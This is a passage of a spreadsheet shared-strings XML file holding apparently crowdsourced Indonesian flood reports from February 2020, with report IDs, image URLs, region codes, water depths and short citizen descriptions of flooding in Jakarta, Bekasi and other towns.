    <t>https://images.petabencana.id/a96e1fc1-37f2-4a91-8529-8f702c6f4b26.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "768", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir cempaka putih barat</t>
  </si>
  <si>
    <t>Karet Tengsin</t>
  </si>
  <si>
    <t>e24cd903-be81-4342-b93c-e74dfe72e450</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e24cd903-be81-4342-b93c-e74dfe72e450.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1679", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Malaka Sari</t>
  </si>
  <si>
    <t>28f6f270-9ef8-4693-ba73-0511dcf154ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/28f6f270-9ef8-4693-ba73-0511dcf154ba.jpg</t>
  </si>
  <si>
    <t>Banjir, setinggi 30cm, masuk ke dalam pemukiman warga, saluran air terhambat karena sampah dan salurannya tidak memadai utk menampung air</t>
  </si>
  <si>
    <t>Tanah Tinggi</t>
  </si>
  <si>
    <t>547bc75f-5d24-4a2b-b75a-4a36c22d1133</t>
  </si>
  <si>
    <t>https://images.petabencana.id/547bc75f-5d24-4a2b-b75a-4a36c22d1133.jpg</t>
  </si>
  <si>
    <t>Pasar sunter podomoro, komplek DKI Sunter Agung banjir 50 cm &gt;. Terakhir kayak gini 2014. Insya Allah hujan berhenti segera dan air surut.</t>
  </si>
  <si>
    <t>2b0f414e-9644-4b9e-b574-2357d07aa74a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2b0f414e-9644-4b9e-b574-2357d07aa74a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "476", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih dapat dilalui kendaraan</t>
  </si>
  <si>
    <t>81cd5c4a-05f2-4b94-a38d-499454a5fbd1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/81cd5c4a-05f2-4b94-a38d-499454a5fbd1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "474", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Cempaka Putih Tengah IIB</t>
  </si>
  <si>
    <t>9e2e54f2-23d5-4446-be8c-dddb42b8e8c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e2e54f2-23d5-4446-be8c-dddb42b8e8c1.jpg</t>
  </si>
  <si>
    <t>Jl. Cempaka Putih Tengah IIC</t>
  </si>
  <si>
    <t>e051a2e2-862a-45a6-9d63-9977ec9d1598</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2366", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setengah betis lebih di Kelapa Gading. Mungkin ada bagian Kelapa Gading lainnya yg banjirnya lebih tinggi</t>
  </si>
  <si>
    <t>be386e62-1940-4125-ae52-25d702b0253e</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2530", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sebetis kaki</t>
  </si>
  <si>
    <t>a7c6c7b1-492f-4b8c-845b-66a729f3aaff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7c6c7b1-492f-4b8c-845b-66a729f3aaff.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1556", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kodamar banjir</t>
  </si>
  <si>
    <t>b00d381d-939d-4b1a-9ccd-0d634e5be69d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b00d381d-939d-4b1a-9ccd-0d634e5be69d.jpg</t>
  </si>
  <si>
    <t>Banjir sebetis orang dewasa</t>
  </si>
  <si>
    <t>4927db0c-95a6-4cef-a78a-dd80818782c1</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1823", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Taman Nyiur Sunter</t>
  </si>
  <si>
    <t>fe8ccc60-d86d-456a-9239-1f5c7fd50852</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fe8ccc60-d86d-456a-9239-1f5c7fd50852.jpg</t>
  </si>
  <si>
    <t>Mobil banyak berhenti, roda dua banyak yg  mogok</t>
  </si>
  <si>
    <t>b293948f-b8f6-4583-af07-72117cf08617</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b293948f-b8f6-4583-af07-72117cf08617.jpg</t>
  </si>
  <si>
    <t>847639a4-dac9-4fa4-b744-e9d71615bb79</t>
  </si>
  <si>
    <t>https://images.petabencana.id/847639a4-dac9-4fa4-b744-e9d71615bb79.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2104", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir sebetis dewasa</t>
  </si>
  <si>
    <t>7cf50816-5a15-44c6-a38f-3deff06282f3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7cf50816-5a15-44c6-a38f-3deff06282f3.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek antilope lokasi sekitar masjid darul hikam</t>
  </si>
  <si>
    <t>Jaticempaka</t>
  </si>
  <si>
    <t>7b1f39cc-253c-42a3-bd8f-e7e1eb5332d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7b1f39cc-253c-42a3-bd8f-e7e1eb5332d9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2026", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jalan Ra Kelapa Nias, Kelapa Gading</t>
  </si>
  <si>
    <t>a6b3573f-eb0e-430d-92d9-95274985b780</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 101, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Gang kantong, TPI 2, Teluk Gong banjir lagi. 100 cm."</t>
  </si>
  <si>
    <t>9b6bd122-caa9-455a-8c38-8f9bc0902d61</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9b6bd122-caa9-455a-8c38-8f9bc0902d61.jpg</t>
  </si>
  <si>
    <t>Perumahan Essence Park</t>
  </si>
  <si>
    <t>9aba0f66-0bf7-49b5-b492-74ae567c7398</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9aba0f66-0bf7-49b5-b492-74ae567c7398.jpg</t>
  </si>
  <si>
    <t>Hujan sejam udah banjir parah. Cempaka putih barat selalu kena.</t>
  </si>
  <si>
    <t>8b5e1a13-ff4f-4378-a31a-e49104efede5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b5e1a13-ff4f-4378-a31a-e49104efede5.jpg</t>
  </si>
  <si>
    <t>halaman masjid Darul hitam, jaticempaka. pd gede Bekasi</t>
  </si>
  <si>
    <t>d3ed4680-5cee-4eda-a41f-f7ff81d22d49</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2350", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mohon untuk segera diatasi</t>
  </si>
  <si>
    <t>Semper Barat</t>
  </si>
  <si>
    <t>bcd9c34d-6aa8-4dc0-907b-4924a003d1a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bcd9c34d-6aa8-4dc0-907b-4924a003d1a9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2105", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>a6d0509b-af3a-4a87-ad80-fa1c03949efe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a6d0509b-af3a-4a87-ad80-fa1c03949efe.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1948", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan Lottemart Boulevard Barat Raya Klp Gdg</t>
  </si>
  <si>
    <t>7190b4b4-c54d-47d1-bbb7-6a06786aaef6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7190b4b4-c54d-47d1-bbb7-6a06786aaef6.jpg</t>
  </si>
  <si>
    <t>Depan RS Mitra Klp Gdg</t>
  </si>
  <si>
    <t>7f1b8177-826b-4001-aa66-b40d00c929de</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f1b8177-826b-4001-aa66-b40d00c929de.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "1979", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lokasi depan GOR benhil jakarta pusat</t>
  </si>
  <si>
    <t>285a7058-4e8a-4d7f-a864-b197610c451b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/285a7058-4e8a-4d7f-a864-b197610c451b.jpg</t>
  </si>
  <si>
    <t>Depan Honda Familymart Yoshinoya Boulevard Barat Raya Klp Gdg</t>
  </si>
  <si>
    <t>ff217bef-6f78-423a-b656-3a607e570325</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff217bef-6f78-423a-b656-3a607e570325.jpg</t>
  </si>
  <si>
    <t>Gading Mediterania depan NJIS Seafood Ayu</t>
  </si>
  <si>
    <t>47c1c9a0-5397-4b17-9305-083f89e277c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47c1c9a0-5397-4b17-9305-083f89e277c7.jpg</t>
  </si>
  <si>
    <t>c5d901bf-fb23-4346-9449-779b71904041</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5d901bf-fb23-4346-9449-779b71904041.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1452", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Kawasan industri pulo gadung, dengan ketinggian kisaran 30-65 cm</t>
  </si>
  <si>
    <t>72af6d3f-e25f-4465-93e5-f6aa70b4df7e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72af6d3f-e25f-4465-93e5-f6aa70b4df7e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2537", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hibrida Klp Gdg depan Bakmi Kofei</t>
  </si>
  <si>
    <t>8f68e399-a161-4f5d-a0e7-7c2b11ca7553</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f68e399-a161-4f5d-a0e7-7c2b11ca7553.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 19, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Perum. Jatiwaringin Asri</t>
  </si>
  <si>
    <t>Jatiwaringin</t>
  </si>
  <si>
    <t>0b5dea4e-9efc-44d8-8b03-b5e67a7825a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0b5dea4e-9efc-44d8-8b03-b5e67a7825a0.jpg</t>
  </si>
  <si>
    <t>Janur Asri</t>
  </si>
  <si>
    <t>b8a5d002-dd40-464d-8d85-ff9e39c967ae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b8a5d002-dd40-464d-8d85-ff9e39c967ae.jpg</t>
  </si>
  <si>
    <t>Artha Gading depan Pom Bensin McD</t>
  </si>
  <si>
    <t>81f068cb-3838-497c-9723-eb1c9274123f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/81f068cb-3838-497c-9723-eb1c9274123f.jpg</t>
  </si>
  <si>
    <t>jl. jatiprana. kel. jaticempaka. pd. gede. Bekasi</t>
  </si>
  <si>
    <t>bf4ca7ed-69a6-4b65-95b9-a8ca78a26eb4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bf4ca7ed-69a6-4b65-95b9-a8ca78a26eb4.jpg</t>
  </si>
  <si>
    <t>Depan Hotel Harris Klp Gdg belakang MKG</t>
  </si>
  <si>
    <t>74355d9a-dede-43e3-96f6-53594e75bf00</t>
  </si>
  <si>
    <t>Di depan rumah, tp karena rumah tinggi, air tdk masuk rumah</t>
  </si>
  <si>
    <t>Pusakarakyat</t>
  </si>
  <si>
    <t>f7dab7ae-8f49-4106-99ad-43d4faecfc9d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7dab7ae-8f49-4106-99ad-43d4faecfc9d.jpg</t>
  </si>
  <si>
    <t>Lotte</t>
  </si>
  <si>
    <t>4fc5b41e-c8b6-44dc-b1c9-03485a90e0c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4fc5b41e-c8b6-44dc-b1c9-03485a90e0c1.jpg</t>
  </si>
  <si>
    <t>Depan MKG</t>
  </si>
  <si>
    <t>9247a163-35f8-47ad-8060-7e8446ad0cce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9247a163-35f8-47ad-8060-7e8446ad0cce.jpg</t>
  </si>
  <si>
    <t>Depan Oak Tower RS Mediros Perintis Kemerdekaan arah Pulo Gadung</t>
  </si>
  <si>
    <t>c0c4c866-56b9-4774-87fb-2862181aaa33</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c0c4c866-56b9-4774-87fb-2862181aaa33.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 35, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir 35 cm di Jakasampurna, Kota Bekasi.</t>
  </si>
  <si>
    <t>Jaka Sampurna</t>
  </si>
  <si>
    <t>fcb7aff2-feb9-43f0-b810-42590ca9319b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fcb7aff2-feb9-43f0-b810-42590ca9319b.jpg</t>
  </si>
  <si>
    <t>Disekitar mall kelapa gading</t>
  </si>
  <si>
    <t>fc42d91a-50dc-4704-84f4-5b0474cf2c53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fc42d91a-50dc-4704-84f4-5b0474cf2c53.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1429", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi lutut dewasa</t>
  </si>
  <si>
    <t>02e8c288-c632-416e-82dd-d48bd8bd8810</t>
  </si>
  <si>
    <t>https://images.petabencana.id/02e8c288-c632-416e-82dd-d48bd8bd8810.jpg</t>
  </si>
  <si>
    <t>Ini di bawah pintu tol kelapa gading dan cemp putih</t>
  </si>
  <si>
    <t>2dcd182d-47c8-4974-be43-ea70bf2183ea</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1196", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir pada subuh tanggal 8 februari 2020 di kali dekat pesantren Daarul Ishlah Assalafiyah, Warung Jati Barat.</t>
  </si>
  <si>
    <t>4b9e8481-33b4-4d0f-b0e4-f0ee5ac77f27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b9e8481-33b4-4d0f-b0e4-f0ee5ac77f27.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2283", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>679cf0f6-adf7-45a1-b709-fead2f720d9d</t>
  </si>
  <si>
    <t>duta kranji blok C</t>
  </si>
  <si>
    <t>ccd9e131-e6e0-453b-9af6-c3f134d42872</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ccd9e131-e6e0-453b-9af6-c3f134d42872.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1636", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Janur Elok 7 Klp Gdg</t>
  </si>
  <si>
    <t>5cc000f6-ca56-4569-853a-016a6d22cab7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5cc000f6-ca56-4569-853a-016a6d22cab7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2681", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir lah pokonya, cape aing</t>
  </si>
  <si>
    <t>3130a7e7-b8d0-4f1c-956f-08482e13904c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3130a7e7-b8d0-4f1c-956f-08482e13904c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2686", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir nya lebih tinggi Dari banjir tahun baru</t>
  </si>
  <si>
    <t>b16f8db4-9fc3-4205-95fa-5c7ecfd29511</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b16f8db4-9fc3-4205-95fa-5c7ecfd29511.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "897", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah hampir mencapai lt 2 rumah.</t>
  </si>
  <si>
    <t>3486c392-6f09-48ba-af31-59f6de614a18</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3486c392-6f09-48ba-af31-59f6de614a18.jpg</t>
  </si>
  <si>
    <t>Di Perumahan Bekasi Timur Permai, Banjir</t>
  </si>
  <si>
    <t>Setiamekar</t>
  </si>
  <si>
    <t>Tambun Selatan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348791</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/08/1581120615924717114.jpg</t>
  </si>
  <si>
    <t>Jakarta Diguyur Hujan Jalan Melur Tugu V Koja Jakut Banjir</t>
  </si>
  <si>
    <t>Jalan Melur Tugu V Koja Jakarta Utara Banjir, usai Jakarta di guyur hujan sejak dini hari</t>
  </si>
  <si>
    <t>fce7b7e1-dd66-4f79-94c1-b6c5d6722d50</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "805", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjirnya tiap hujan deras...karena terhambatnya aliran oleh pipa di bawah jalan  depan SD Nirwana ,Rw014 Kebon Melati Tanah Abang</t>
  </si>
  <si>
    <t>Kebon Kacang</t>
  </si>
  <si>
    <t>acc04da1-506b-4327-8d5c-87150273df14</t>
  </si>
  <si>
    <t>https://images.petabencana.id/acc04da1-506b-4327-8d5c-87150273df14.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2062", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir depan MOI</t>
  </si>
  <si>
    <t>11ab6382-32fd-4f81-9e02-78640ec681d8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11ab6382-32fd-4f81-9e02-78640ec681d8.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "265", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Semangka 1, Jati Pulo, Jakbar 11430</t>
  </si>
  <si>
    <t>Jati Pulo</t>
  </si>
  <si>
    <t>a27c1692-8930-4440-87be-beccca1eb6b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a27c1692-8930-4440-87be-beccca1eb6b4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1884", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#banjir di kebon pala-halim</t>
  </si>
  <si>
    <t>689f2388-5f73-41d4-bee3-cf81709e1b5b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/689f2388-5f73-41d4-bee3-cf81709e1b5b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1905", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan harapan 3 kelurahan cipinang melayu ketinggian banjir sdh 20cm</t>
  </si>
  <si>
    <t>9c597c75-b68b-41fd-a133-b855534983a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9c597c75-b68b-41fd-a133-b855534983a9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1581", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. H. Sulaeman RW.3 Kel.Cipinang Melayu Kec.Makasar, Jakarta Timur</t>
  </si>
  <si>
    <t>d8cdc046-4259-43aa-b80b-a6763425e585</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d8cdc046-4259-43aa-b80b-a6763425e585.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2385", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir belakang Shangri-La</t>
  </si>
  <si>
    <t>9554b815-edb9-4982-b0df-4996d2e88a12</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9554b815-edb9-4982-b0df-4996d2e88a12.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 43, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sebetis orang dewasa pk. 09.30 masih tergenang blm surut</t>
  </si>
  <si>
    <t>5d4dcfdd-78f8-45d5-a9d5-d9b833fc2d3a</t>
  </si>
  <si>
    <t>Banjir selalu terjadi ketika hujan lebat didepan kahatex. Banjir tersebut menutup segala akativitas dan akses jalan serta tentunya merugikan</t>
  </si>
  <si>
    <t>8d4b4c95-303f-47c2-b19c-d81c7362d658</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8d4b4c95-303f-47c2-b19c-d81c7362d658.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1895", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>air sampai sampai kejalan dikarena gorong2 air daket team PPSU, dr pasar embrio ke kali, gorong2 di beri lubang agar jalan tidak rusak</t>
  </si>
  <si>
    <t>2dbf1f6e-99f8-48d9-b194-9293aaeca196</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2dbf1f6e-99f8-48d9-b194-9293aaeca196.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2192", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Perintis Kemerdekaan arah ke Pulogadung banjir menggenang. Arah sebaliknya relatif aman tetapi macet parah.</t>
  </si>
  <si>
    <t>500b5dbe-edfb-4836-ae15-ac16ed7d0c22</t>
  </si>
  <si>
    <t>https://images.petabencana.id/500b5dbe-edfb-4836-ae15-ac16ed7d0c22.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 76, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di perkampungan green garden rt04 rw08 Kedoya Utara Jakarta Barat</t>
  </si>
  <si>
    <t>46a1bc30-61fb-42ab-953e-8e3bb03d49e7</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2106", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>844e1aae-2580-47a7-9656-8906d1254ad4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/844e1aae-2580-47a7-9656-8906d1254ad4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2354", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>55162595-3b4a-4536-b5bf-f11a28fedc2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/55162595-3b4a-4536-b5bf-f11a28fedc2c.jpg</t>
  </si>
  <si>
    <t>465ded8d-dfb1-4198-92fe-dc5d0f836ef7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/465ded8d-dfb1-4198-92fe-dc5d0f836ef7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2510", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di perubahan sepanjang Pegangsaan Dua yg berdekatan dgn kali. semakin dekat kali semakin dalam.</t>
  </si>
  <si>
    <t>c794912f-d3d7-447e-a958-1e54d7d3a753</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c794912f-d3d7-447e-a958-1e54d7d3a753.jpg</t>
  </si>
  <si>
    <t>Area MOI kelapa gading jakarta utara banjir nya dalem cuy</t>
  </si>
  <si>
    <t>b7152db5-2861-4942-b174-ece0330d0d1c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7152db5-2861-4942-b174-ece0330d0d1c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2680", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di RT 002 RW 04 Cipinang Melayu, Jakarta Timur</t>
  </si>
  <si>
    <t>fb2fc0b7-cb2e-4684-86bf-663d5b121896</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb2fc0b7-cb2e-4684-86bf-663d5b121896.jpg</t>
  </si>
  <si>
    <t>Hibrida Kelapa Gading</t>
  </si>
  <si>
    <t>1399a072-36e4-4e52-828c-a2d8c6107c70</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1399a072-36e4-4e52-828c-a2d8c6107c70.jpg</t>
  </si>
  <si>
    <t>Perumahan Rancaekek permai 2 blok C RT 04 RW 23 desa jelegong kecamatan Rancaekek kabupaten Bandung Jawa barat Indonesia</t>
  </si>
  <si>
    <t>Linggar</t>
  </si>
  <si>
    <t>5e438ede-12d6-49ff-b414-ea649f8a8ab2</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "669", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mendung terus saja, siap2 hujan</t>
  </si>
  <si>
    <t>Pegangsaan</t>
  </si>
  <si>
    <t>32bc9844-a80b-4e27-8485-a09acbf64ff5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32bc9844-a80b-4e27-8485-a09acbf64ff5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2493", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ba802099-a23f-4849-98a7-54d5e569a687</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ba802099-a23f-4849-98a7-54d5e569a687.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 18, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "290", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Daerah Cempaka - Kota Bambu dah Banjir.. Sepertinya karena pompa ngga dinyalakan</t>
  </si>
  <si>
    <t>Kota Bambu Utara</t>
  </si>
  <si>
    <t>309ae5d9-8526-4384-b34a-deb4ee5abbfd</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2005", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di depan sekolah smak 1, jalan raya apartemen mediterania</t>
  </si>
  <si>
    <t>Tanjung Duren Selatan</t>
  </si>
  <si>
    <t>32d1e730-972d-459f-afef-283ec6eaf8b0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32d1e730-972d-459f-afef-283ec6eaf8b0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>banjir d sekitar purwadadi ketinggian mencapai 53 cm</t>
  </si>
  <si>
    <t>Tepusen</t>
  </si>
  <si>
    <t>Kaloran</t>
  </si>
  <si>
    <t>Temanggung</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349122</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/14/15816850361458488775.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-YO" }</t>
  </si>
  <si>
    <t>Genangan Air Sebabkan Kemacetan di Jalan Wates</t>
  </si>
  <si>
    <t>Banjir terjadi di jalan Wates km 5 tepatnya di depan pasar Gamping, banjir dikarenakan hujan dari tadi siang, juga kurang baik saluran air. banjir mengakibatkan lalu lintas macet, macet terjadi dari 2 arah.</t>
  </si>
  <si>
    <t>Ambarketawang</t>
  </si>
  <si>
    <t>Gamping</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349123</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/15/15817007481488986588.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-JI" }</t>
  </si>
  <si>
    <t>Hujan Tak Kungjung Reda, Jalan Kelun Mulai Digenangi Air</t>
  </si>
  <si>
    <t>Hujan deras jum'at (14/02/2020) malam, dini hari ini jalan raya kelun kelurahan Kelun, kecamatan Kartoharjo kota Madiun, terendam banjir.</t>
  </si>
  <si>
    <t>a2d67653-064a-4428-9f44-2dca5fb8cc3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a2d67653-064a-4428-9f44-2dca5fb8cc3d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-JB" }</t>
  </si>
  <si>
    <t>b12b73c6-b088-4c69-ac87-e8300affeaf7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b12b73c6-b088-4c69-ac87-e8300affeaf7.jpg</t>
  </si>
  <si>
    <t>Genangan setinggi kurleb 25cm. Angin dan intensitas hujan tinggi #sayasiagasayatangguh"</t>
  </si>
  <si>
    <t>Gunung Anyar</t>
  </si>
  <si>
    <t>3864a565-1f9a-4087-bd7c-ada7fac31132</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3864a565-1f9a-4087-bd7c-ada7fac31132.jpg</t>
  </si>
  <si>
    <t>Sekedar hujan, tidak banjir, hanya jalanan menjadi padat. Dari bogor arah ke Jakarta Km. 26"</t>
  </si>
  <si>
    <t>Sukatani</t>
  </si>
  <si>
    <t>Sukaraja</t>
  </si>
  <si>
    <t>795a02ef-3e73-4949-8fe9-4d2c999410a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/795a02ef-3e73-4949-8fe9-4d2c999410a0.jpg</t>
  </si>
  <si>
    <t>kejadian genangan air Dusun Cigulingharjo. Rt.03/07. Desa. padangjaya Kecamatan Majenang Kab.Cilacap Minggu 16 Februari 2020 pukul.15.00."</t>
  </si>
  <si>
    <t>Padangjaya</t>
  </si>
  <si>
    <t>Majenang</t>
  </si>
  <si>
    <t>Cilacap</t>
  </si>
  <si>
    <t>4dcbd9b9-14d6-4f57-9457-909796dd5b77</t>
  </si>
